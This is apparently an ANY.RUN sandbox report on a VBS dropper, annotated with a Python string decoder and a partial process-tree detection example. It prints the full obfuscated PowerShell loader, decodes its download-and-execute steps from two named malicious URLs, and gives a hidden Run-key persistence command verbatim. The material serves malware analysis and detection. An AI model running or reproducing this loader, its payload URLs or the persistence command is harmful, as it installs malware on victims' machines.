File name: SAMPLE ORDER.vbs

Full analysis: https://app.any.run/tasks/23384be5-bfdf-49b2-9e04-492b279d2c99
Verdict: Malicious activity
Analysis date: August 22, 2024, 06:23:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: ADEE037A2A0E36129B2A9FB5F0413648
SHA1: 6F80D6F569CD259472712D3C705E2BF56F821620
SHA256: E2EDE61AE4FA068D90A785DFC7D1F7FCC8980B2ECF9E4263F7822D78023FEAA2
SSDEEP: 192:i7+7NyxeeDS0Kyfi2ZYNHAYSj+nMs6ZPv7L6v/EfzB1WKikyawhI7c2kBN3gW3CW:i+7WLDSzyaMEgRyMs6h7G3ELf+mslx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes the autorun value in the registry: reg.exe (PID: 3028)
  • SUSPICIOUS
    • Starts POWERSHELL.EXE for commands execution: wscript.exe (PID: 6764), powershell.exe (PID: 6340)
    • Runs shell command (SCRIPT): wscript.exe (PID: 6764)
    • Gets or sets the security protocol (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Starts CMD.EXE for commands execution: powershell.exe (PID: 6340), powershell.exe (PID: 1488), wab.exe (PID: 4760)
    • Uses base64 encoding (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Converts a specified value to a byte (POWERSHELL): powershell.exe (PID: 1488)
    • Reads security settings of Internet Explorer: wab.exe (PID: 4760)
    • Reads the date of Windows installation: wab.exe (PID: 4760)
    • Uses REG/REGEDIT.EXE to modify registry: cmd.exe (PID: 1164)
  • INFO
    • Gets data length (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Disables trace logs: powershell.exe (PID: 6340)
    • Checks proxy server information: powershell.exe (PID: 6340), wab.exe (PID: 4760)
    • Uses string split method (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Creates or changes the value of an item property via Powershell: wscript.exe (PID: 6764), powershell.exe (PID: 6340)
    • Script raised an exception (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Converts byte array into ASCII string (POWERSHELL): powershell.exe (PID: 6340), powershell.exe (PID: 1488)
    • Checks supported languages: wab.exe (PID: 4760)
    • Process checks computer location settings: wab.exe (PID: 4760)
    • Reads the computer name: wab.exe (PID: 4760)
Malware configuration: none extracted. (Signature artifacts and their MITRE ATT&CK mapping are only in the full report.)
Screenshots: available in the full report only.
Total processes: 144
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 2

Behavior graph

Process tree reconstructed from the process list below. The report names each parent but gives no parent PID; edges marked * have a parent given only as "powershell.exe" and are placed by elimination: PID 1488 is the only other PowerShell process, PID 6812 is the SysWOW64 cmd.exe that a 32-bit caller receives when it asks for System32\cmd.exe, and wab.exe and everything under it run as 32-bit processes.

explorer.exe
  wscript.exe (6764)            "SAMPLE ORDER.vbs"
    powershell.exe (6340)       64-bit host; obfuscated stage-1 script
      conhost.exe (6464) *
      cmd.exe (6468)            /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"
      powershell.exe (1488) *   32-bit host; same script
        cmd.exe (6812) *        /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"
        wab.exe (4760) *        Windows Contacts, started with no arguments
          cmd.exe (1164)        /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Entreindtgterne49" ...
            conhost.exe (6920)
            reg.exe (3028)

Process information

PID 1164: cmd.exe  (parent: wab.exe)
Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Entreindtgterne49" /t REG_EXPAND_SZ /d "%Rsonnables% -w 1 $Middagsselskabers=(Get-ItemProperty -Path 'HKCU:\Lgnernes\').Spreathed;%Rsonnables% ($Middagsselskabers)"
Image: C:\Windows\SysWOW64\cmd.exe (the System32 path in the command line is redirected to SysWOW64 because the caller is a 32-bit process)
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Note: this is the persistence step. The value type is REG_EXPAND_SZ, so %Rsonnables% is expanded at logon: the launcher executable lives in an environment variable and the script body in HKCU:\Lgnernes\Spreathed, which keeps any recognisable PowerShell path or payload out of the Run value itself. "-w 1" is -WindowStyle Hidden. Neither the %Rsonnables% variable nor the Lgnernes key appears in the registry excerpt further down this page.
Loaded modules:
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID 1488: powershell.exe  (parent: powershell.exe; PID 6340 is the only other PowerShell process)
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (32-bit host)
Command line (one line; the page wraps it at arbitrary points. PID 6340 ran the identical script from the 64-bit host):
"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Scrooping='SUBsTR';$Latterliggjorde35++;}$Scrooping+='ing';Function Creophagia($Afvrgelser){$Emarginated=$Afvrgelser.Length-$Latterliggjorde35;For( $Skold=4;$Skold -lt $Emarginated;$Skold+=5){$Cutlery+=$Afvrgelser.$Scrooping.'Invoke'( $Skold, $Latterliggjorde35);}$Cutlery;}function Tropers($Wanly){ .($Phenacyl) ($Wanly);}$charting=Creophagia 'StriMAngioA,trzSpiriSo.jl.onvlInt.a hel/ Mos5 Kul.Opf 0Decu Slam(Bro,W S,oiBacknGeomd.elvoAvlewVrkss,fst FataNForfTH,re Neg1Otte0Anlb.Trst0Send; Lec uniW A ai hynn Co.6Zone4 Fed; Ly. .ovexaero6Frla4 T.l;Or,h utr Blavsten:Selv1 onf2Post1Kopi.unla0C.an)Fo.v SqueG onueR,gacNon.kRek oHal /Ka m2,eot0Unpr1Sgek0goos0Drag1Opko0A st1Holo SnvlFIndei.onsrSmileForhfpo.no,ammxrebl/ Myr1.tem2Sydv1Unde. Ep.0Utro ';$Whippets=Creophagia ' SepUMyrvsSerieUhmmrNytt-PoetAGispgByplePolyn,rottSuss ';$Spelt=Creophagia 'Sheeh.emitParatndrip.agpsGlam: Dif/Komm/I,dgaLimotStivePtosr BeseOpblc Mn i.oopeSaarrFolkaRa.pi.lass ous.Oever Rasukmme.RecrcUst.oBasimNonp/he.dwTeorpAlis-ShiniSkylnVi tc Stal lycuSuped Dkne,obss .yk/ PauiO,eamF,tngOuts/St tTPen.eM,sosCaritOldsa MonmRebee,ntenTomjt eldDirtjI pirDopi.JoshsPor nCupupSand>granh Hu t fo,t ,olpHan.:Ca.r/U ba/UndiaRo,tmdertbSam.yHel.vAge,e B,rrS recPer.eNeu .,eauc nteoJulemMili/SalpTU.maeSk usLawlt outa Infm UnceSystnJau tTracd CabjFlexrVens.,emisHydrnSalip av ';$Sjalers=Creophagia 'indt>regn ';$Phenacyl=Creophagia 'SursiMedgeOverxFlag ';$Lovelier='Benzintankstation';$Skoldnviousness = Creophagia 'Inare.arccSvajhTin.o F,s Expu%,ezcaF imp Re.pTredd Po a.mprtHo,ea Una%Rikk\RgfaEOprrk .ansNrt.kAntil.rveuUndedLoqueResirUlemiPrefnH,lpg raneHeberKly.n ippe,uit1T,pt8Rigs0.rac.RigiSUnc,lSimuuKlpu Anag&Unvi&Flod Lit.eGithcE tihNon oV.ri malltU,so ';Tropers (Creophagia 'Semi$ IndgNedel.arto.esubBrera Manl Gru: BarUmirrnHydacSmerrKathaFagrmRrin=Fupm(TrancAniem .egd Liz Lsla/NephcFeif Ridd$ProdSSpackMahzoAfp,lDet dT,ilnDeervAssyiflagoRefiu BissStvlnJaveeAkens PalsBals)Unc, ');Tropers (Creophagia ',nju$NemmgRettl,bbroCaimbAfloaAalelNick:WomaURdj,dcinqm De,aKagen Vrivvan rKo te SerrEs hiMo un R,ngPart=Elec$ApodS hslpFol.eSydslSkjotKo,p.SstesLedepFo,slBev.i DeltHybr(Spir$GiftSdoodjTogla Slulpun.e Intr,dbasBobi),enc ');Tropers (Creophagia 'Klag[AstaNkapienonmtUrvr. Bj.SDisceStryrRcv vMod iRegecAlace MonPMulto poiiSlagnEju.t .ntM FysaI ron TreadelsgDisbeCalirI,se] lem:vodu:DdshSKanaeLenscU.deuandarUnc.i,atitEkspyDissPCir r nebo KlitVa,io Or cFre o P nlplot Cott=Flsk Muf[StedN MaeeTthetGrue.C alS oxyeDunjcOrkau earBesmiScrotIbr.y acrPzygorC,cloTryktI.fioEasec ChaoRevol S.pTadmoyAna pSoleeDepi]Grun:Tyve:DamkT GenlOp.asAfb,1Jage2Meta ');$Spelt=$Udmanvrering[0];$Skoldmpotens= (Creophagia 'Brug$CacogKampl B.noIns,bRoskaLovtlPlat:d.izD Afsi rudsUn.dcPetrl coeoOmstsOutbu emirConse Ba.=mephNAmageTu.swKeel- Th,OCassbrolfjLicue Vricfri,tunp S daSSk rySubssLyditBib,eRu,im ub.FrimNStrae totHe,b.SeptWxante N.tbEvneCt.velChaui,anteTerrnlotot');$Skoldmpotens+=$Uncram[1];Tropers ($Skoldmpotens);Tropers (Creophagia 'Me s$FaneD .ati JydsMolec MetlU,deoowass St.u D,rrFanteKred.Va.dHI.omeRamoa.adddDataeDebarVagisr,th[Acid$CoopW Norh RopiUna.pNummpadm eDishtFamisOpfi]Sati=Ford$ nuc SsthM traProtrBaggt .riilselnS,nng Tom ');$Ninetyseven=Creophagia 'Fest$ TakDSuspi RaisReshcBalsl Spoo HazsEmbruKararElskeJo,g.JustDJaw.oTsa,wOkulnblaslUdtyooptaaAa ndIndsFNonpi A tlPupueCosi( Cer$ForbSP.aspRelieEnt,lUt,atHigh, oha$De oBBed.umuhanBod,kScene nder.odsyD en)repr ';$Bunkery=$Uncram[0];Tropers (Creophagia 'Slab$UltrgSer,lAmalo,lutb H,naLig l Lep:UdryHudliu bram erbbTi.euJazzgOutsgPl,neDel.rJot,sCuar= ris(Plu.Tspere.epasUmptt Bee- lymPQuayaL bitIntahRess Mutt$ Ac,B AltuDistnUdenkValgeLe srFreqyFjrt)Obar ');while (!$Humbuggers) {Tropers (Creophagia 'Sili$AndegTrstlBel oSvupb S oaUri lCons:Sor.VBahrestrinKa,rgNetfePoly=Shin$Sup tEkspr In.u K seChem ') ;Tropers $Ninetyseven;Tropers (Creophagia 'Br dS.lletDo,aaRevlr Erst pr-,entSS.nil b ee rateTur pPode Supp4S ra ');Tropers (Creophagia 'Knle$MetagSto,l HaaoSo,hbRetsaBroal,urf:Or rH.leiuBevim vabFunkuO.eog subgSalgeSor.r Unws ru= M.l(Tr dTMettePr.dsWorstOmlb- In,PS.lva .crtFinghSa,a ge l$S tdB BeguFogenOmplkDecieUrolrKenwyPoli) Dep ') ;Tropers (Creophagia '.tar$DiscgEreclM.quoAxodbBobla AmblAsne:,oloTBusbiMel lVi ltExteaLipogC.mbeDiskr Ov,= pr.$ B.agVaa lLam.oTetrbIls,a ritl har: SupnAuste BepbCapsu,roslHydra Ti.eDero+.kbn+Bubo%F,re$Kva UCanadCaptmDestaLatenLse.vK.rtrpau eSph ra,taiSpecnBrohgLens.Int,cS,epoGadeu St,nsufft Sat ') ;$Spelt=$Udmanvrering[$Tiltager];}$Blackwasher=346457;$Alkynes=27968;Tropers (Creophagia 'Basb$Baskg O.tlDampo,adib SchaPyrolTnde: DisB FakeAnkekAe orT.staFlaaefuldfStudtBetoeAme sProv Bnks=desi UdgrGPr peLenctAbst-SaneC TytoM,stnUdmatPense,addn etat Non Tran$ At BMedtuApprnLingkcarle TvurBrobyMagn ');Tropers (Creophagia ' Spi$OvergI,pulinaroCr.ib T,naVes.lWors:BedaUT chnNignc Anno mobm WrypS.xfeSemitme.si DestCarriUn,ovBevaeIslenEquie MersTegnsOver shoo=Fisk S rv[GlosS ley.iblsCalat Fine orem.ndu.SgetC IndoForkn.upev,iseeK rtrCalatBlo ]Der,:Sgel:SpisF CenrMikroukonmbudsBSydla ass MoreHol,6Sy.p4PattS hantCommrFrisi DisnUtmmgAdre(Alpe$tuliB Ov e olkkOve r aedaDurieToucfProatPriseFluosV,ll)P.la ');Tropers (Creophagia '.uld$ AfsgP,umlBijeoAcrobVissaP.illCa.o: GamTHestaListlBagteTilbgovera LumvRoboeKlg rMis n pre Hoo Shor=P.is Impl[ CraS.mbayIntesSamstMilieTrafmSlik.Udd,TPerie L,mx VoutTigh.FilmEArchnarthcV tio Fy,dFroniSextn HydgCiti]Mach:Til,: .ouAAcalSinchCAn oITotaI H.i.Fl,kGskreeslbetChloSKlovt OverNedsiDe tn ForgDupl(Apo $EvenUDekonsoluc,hatoerstmkabip.onoe Soctm daiCabbt ScyiF,apvSammedestnPaadePatrs Bess Sni)Aa.e ');Tropers (Creophagia 'Prog$.ntrgIndulP.rfo SirbFrdsaS nol E u:ForsSMukkgKalke kn.sGlu t Ou.iBeareForkr Kaan zapeKri sMet,=Astu$ BanTL.knaDk.blFul.eS.augArbeaDisavEgoteAe or avenUnsoe,ler.e.stsS.rsuVietbEme.sOpretCos,rStoei arn B,ogBe o(Gave$ NigB DeilTonea R ncMo okEnk.wDis aReins,uvnh,onde SmdrAffo,.elp$Cav,AShabl MarkPhoryIlian Prie BlosColl)Cr,s ');Tropers $Sgestiernes;"
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
What the script does, read by applying its own Creophagia helper to each string literal: $Latterliggjorde35 is incremented once and is therefore 1, $Scrooping becomes 'SUBsTRing', and the loop takes Substring($Skold, 1) for $Skold = 4, 9, 14, ... while $Skold is below Length-1, so every literal is four junk characters followed by one real character and the final group is never consumed. Tropers is .('iex') ($Phenacyl decodes to "iex"). Several literals on this page are damaged because the HTML collapsed runs of spaces, which shifts the five-character frame; the longer strings ($charting, the New-Object line) only decode once the missing spaces are restored. The statements below either decode cleanly or are in clear in the script:
  • $global:Uncram = (cmd /c $Skoldnviousness), where $Skoldnviousness decodes to: echo %appdata%\Ekskluderingerne180.Slu && echo t (PIDs 6468 and 6812). Output line 0 becomes the drop path $Bunkery; output line 1, "t", is appended to "$global:Disclosure=New-Object System.Net.WebClien" so the class name never appears whole in the script.
  • $Sjalers decodes to ">" and $Spelt to two URLs joined by it, https://aterecierais.ru.com/wp-includes/img/Testamentdjr.snp>http://ambyverce.com/Testamentdjr.snp; $Udmanvrering = $Spelt.Split($Sjalers) is the URL list.
  • [Net.ServicePointManager]::SecurityProtocol is set to Tls12 (the "Gets or sets the security protocol" signature) and $Disclosure.Headers[$Whippets] = $charting, where $Whippets decodes to "User-Agent" and $charting is a Mozilla/5.0 Firefox desktop User-Agent string.
  • while (!$Humbuggers): iex "$Disclosure.DownloadFile($Spelt,$Bunkery)", Start-Sleep 4, $Humbuggers = (Test-Path $Bunkery), then $Spelt = $Udmanvrering[$Tiltager] with $Tiltager cycling through the list. The first host never resolved and the second served the file (see DNS requests and HTTP requests).
  • Get-Content $Bunkery, [System.Convert]::FromBase64String, [System.Text.Encoding]::ASCII.GetString, .substring($Blackwasher, $Alkynes) with $Blackwasher = 346457 and $Alkynes = 27968 in clear, then iex of that 27,968-character slice. Everything after this point (the 32-bit re-launch as PID 1488, wab.exe, the Run key) is done by the downloaded stage, which is not on this page; the "Converts a specified value to a byte" signature on PID 1488 comes from that stage, not from the visible script.
Loaded modules:
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
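The decoder below is an added example written for this page; it is not code from the report, from ANY.RUN or from the malware author. It re-implements the script's own Creophagia helper in Python so the literals above can be checked offline, and adds a decode_script helper that pulls every Creophagia '...' literal out of a script body (useful against the full command line in the complete report). The embedded literals are copied from the PID 1488 command line above. One of them, $Spelt, needed a single space re-inserted after "Tomjt" (marked in the code): the page's HTML collapsed two consecutive spaces into one, which shifts the five-character frame, and the same damage is why the User-Agent literal $charting cannot be decoded from the page as printed. Names such as SPELT_REPAIRED, stage_urls and the one-line script used to exercise decode_script are mine.

```python
"""Decoder for the Creophagia string obfuscation used by the PowerShell stage above.

Added example for this page; not code from the report or from the malware.
Scheme, taken from the script itself: $Latterliggjorde35 is incremented once, so it
is 1; $Scrooping becomes 'SUBsTRing'; then
    For($i = 4; $i -lt $s.Length - 1; $i += 5) { $out += $s.Substring($i, 1) }
so each literal is [4 junk chars][1 real char] repeated, and the final group is
skipped because the loop stops before Length-1.
"""
import re
from urllib.parse import urlparse

# Literals copied verbatim from the PID 1488 / 6340 command line on this page.
PHENACYL = "SursiMedgeOverxFlag "                                      # $Phenacyl
WHIPPETS = " SepUMyrvsSerieUhmmrNytt-PoetAGispgByplePolyn,rottSuss "  # $Whippets
SJALERS = "indt>regn "                                                 # $Sjalers
SKOLDNVIOUSNESS = (                                                    # $Skoldnviousness
    r"Inare.arccSvajhTin.o F,s Expu%,ezcaF imp Re.pTredd Po a.mprtHo,ea Una%Rikk\RgfaEOprrk .ansNrt.kAntil.rveuUndedLoqueResirUlemi"
    r"PrefnH,lpg raneHeberKly.n ippe,uit1T,pt8Rigs0.rac.RigiSUnc,lSimuuKlpu Anag&Unvi&Flod Lit.eGithcE tihNon oV.ri malltU,so "
)
# $Spelt with one space restored after "Tomjt" (the page's HTML collapsed two
# spaces into one; without it the frame slips and the output is garbage).
SPELT_REPAIRED = (
    "Sheeh.emitParatndrip.agpsGlam: Dif/Komm/I,dgaLimotStivePtosr BeseOpblc Mn i"
    ".oopeSaarrFolkaRa.pi.lass ous.Oever Rasukmme.RecrcUst.oBasimNonp/he.dwTeorp"
    "Alis-ShiniSkylnVi tc Stal lycuSuped Dkne,obss .yk/ PauiO,eamF,tngOuts/St tT"
    "Pen.eM,sosCaritOldsa MonmRebee,ntenTomjt  eldDirtjI pirDopi.JoshsPor nCupup"
    "Sand>granh Hu t fo,t ,olpHan.:Ca.r/U ba/UndiaRo,tmdertbSam.yHel.vAge,e B,rr"
    "S recPer.eNeu .,eauc nteoJulemMili/SalpTU.maeSk usLawlt outa Infm UnceSystn"
    "Jau tTracd CabjFlexrVens.,emisHydrnSalip av "
)


def creophagia(blob, start=4, stride=5, width=1):
    """Port of the script's Creophagia: Substring(i, width) for i = 4, 9, 14, ... < len-width."""
    end = len(blob) - width  # $Emarginated = $Afvrgelser.Length - $Latterliggjorde35
    return "".join(blob[i:i + width] for i in range(start, end, stride))


LITERAL = re.compile(r"Creophagia\s+'([^']*)'")


def decode_script(script_text):
    """Decode every Creophagia '...' literal in a script body, in source order."""
    return [creophagia(m.group(1)) for m in LITERAL.finditer(script_text)]


def stage_urls(spelt_literal=SPELT_REPAIRED, sjalers_literal=SJALERS):
    """The script does $Spelt.Split($Sjalers); return the resulting URL list."""
    return creophagia(spelt_literal).split(creophagia(sjalers_literal))


def stage_hosts(spelt_literal=SPELT_REPAIRED):
    """Hostnames to block or hunt for, in the order the download loop tries them."""
    return [urlparse(u).hostname for u in stage_urls(spelt_literal)]


if __name__ == "__main__":
    for name, lit in [("$Phenacyl", PHENACYL), ("$Whippets", WHIPPETS),
                      ("$Sjalers", SJALERS), ("$Skoldnviousness", SKOLDNVIOUSNESS),
                      ("$Spelt", SPELT_REPAIRED)]:
        print(f"{name:18} -> {creophagia(lit)!r}")
    print("stage URLs:", stage_urls())
    print("stage hosts:", stage_hosts())
```

The helper is intentionally parameterised (start, stride, width) because other samples built by the same kit vary the offset and group size; for this sample the defaults reproduce the script exactly. When a literal decodes to nonsense part-way through, suspect lost whitespace in the copy rather than a different scheme, and take the command line from the full report's process details instead of from a rendered page.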
PID 3028: reg.exe  (parent: cmd.exe, PID 1164)
Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Entreindtgterne49" /t REG_EXPAND_SZ /d "%Rsonnables% -w 1 $Middagsselskabers=(Get-ItemProperty -Path 'HKCU:\Lgnernes\').Spreathed;%Rsonnables% ($Middagsselskabers)"
Image: C:\Windows\SysWOW64\reg.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Registry Console Tool
Exit code: 0 (the value was written; this is the process behind the MALICIOUS "Changes the autorun value in the registry" signature)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
PID 4760: wab.exe  (parent: powershell.exe)
Command line: "C:\Program Files (x86)\windows mail\wab.exe"  (no arguments)
Image: C:\Program Files (x86)\Windows Mail\wab.exe (32-bit)
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Contacts
Exit code: not reported
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Note: a signed Microsoft binary started by PowerShell with no arguments. Windows Contacts has no reason to read proxy settings, the install date, the computer name or location settings, or to start cmd.exe, yet all of those are attributed to this PID in the signature list and the Run-key persistence (PIDs 1164 and 3028) hangs beneath it; the code doing that was placed in the process by the PowerShell stage. The report does not record the injection itself, so the mechanism is not visible here. mshtml.dll heads the module list, which matches the "Reads security settings of Internet Explorer" signature.
Loaded modules:
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
PID 6340: powershell.exe  (parent: wscript.exe, PID 6764)
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (64-bit host)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the same "If (${host}.CurrentCulture) {...} ... Tropers $Sgestiernes;" script that is printed in full under PID 1488 above; the two command lines differ only in the host path. This is the first PowerShell stage: it is the process that fetched http://ambyverce.com/Testamentdjr.snp and wrote C:\Users\admin\AppData\Roaming\Ekskluderingerne180.Slu (see HTTP requests and Dropped files).
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 6464: conhost.exe  (parent: powershell.exe)
Command line: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Image: C:\Windows\System32\conhost.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 6468: cmd.exe  (parent: powershell.exe)
Command line: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"
Image: C:\Windows\System32\cmd.exe (the 64-bit copy, so the caller was the 64-bit host, PID 6340)
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Note: the script uses cmd.exe only to expand %appdata%: output line 1 becomes the drop path, output line 2 ("t") completes the string "New-Object System.Net.WebClien".
Loaded modules:
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID 6764: wscript.exe  (parent: explorer.exe)
Command line: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SAMPLE ORDER.vbs"
Image: C:\Windows\System32\wscript.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Note: the submitted VBS is the first stage. It is opened from Temp by Explorer, and its recorded actions are the four ZoneMap registry writes listed under Modification events and launching PID 6340 with the whole PowerShell script on the command line.
Loaded modules:
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID 6812: cmd.exe  (parent: powershell.exe)
Command line: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ekskluderingerne180.Slu && echo t"
Image: C:\Windows\SysWOW64\cmd.exe (the caller asked for System32 but received the WOW64 copy, so it was the 32-bit host, PID 1488)
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Loaded modules:
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID 6920: conhost.exe  (parent: cmd.exe)
Command line: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Image: C:\Windows\System32\conhost.exe
User: admin
Company: Microsoft Corporation
Integrity level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded modules:
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
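The detection below is an added example for this page, not ANY.RUN's signature logic and not code from the report. It shows how the chain in the process list (script host, PowerShell, a signed Microsoft binary started without arguments, cmd.exe, reg.exe writing a Run value) can be caught from process-start telemetry, and how the Run value itself gives the persistence away even without the ancestry. The events are constructed to mirror the process list above; the (pid, ppid, image, command_line) shape is an assumption about the log source (Sysmon event 1 or equivalent EDR records), the parent PID of explorer.exe is invented, the parent PIDs that the report gives only by name are filled in from the tree reconstruction, and the "{...}" in the two PowerShell command lines stands in for the long script printed above.

```python
"""Process-tree detection for script host -> PowerShell -> no-arg Microsoft binary
-> cmd.exe -> reg.exe Run-key write, as seen in this report.

Added example for this page. EVENTS is constructed from the process list above,
not sandbox output; the event shape is an assumption about the log source.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)

# Verbatim reg.exe command line from PID 3028 above.
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Entreindtgterne49" /t REG_EXPAND_SZ /d "%Rsonnables% -w 1 $Middagsselskabers=(Get-ItemProperty -Path 'HKCU:\Lgnernes\').Spreathed;%Rsonnables% ($Middagsselskabers)"'''

# Constructed events: (pid, ppid, image, command_line). PPID 1000 (explorer.exe) is invented;
# 6340->1488 and 1488->4760 follow the tree reconstruction, "{...}" elides the script.
EVENTS = [
    (6764, 1000, r"C:\Windows\System32\wscript.exe",
     r'"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\SAMPLE ORDER.vbs"'),
    (6340, 6764, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {...}"'),
    (1488, 6340, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {...}"'),
    (4760, 1488, r"C:\Program Files (x86)\Windows Mail\wab.exe",
     r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    (1164, 4760, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    (3028, 1164, r"C:\Windows\SysWOW64\reg.exe", REG_ADD),
]


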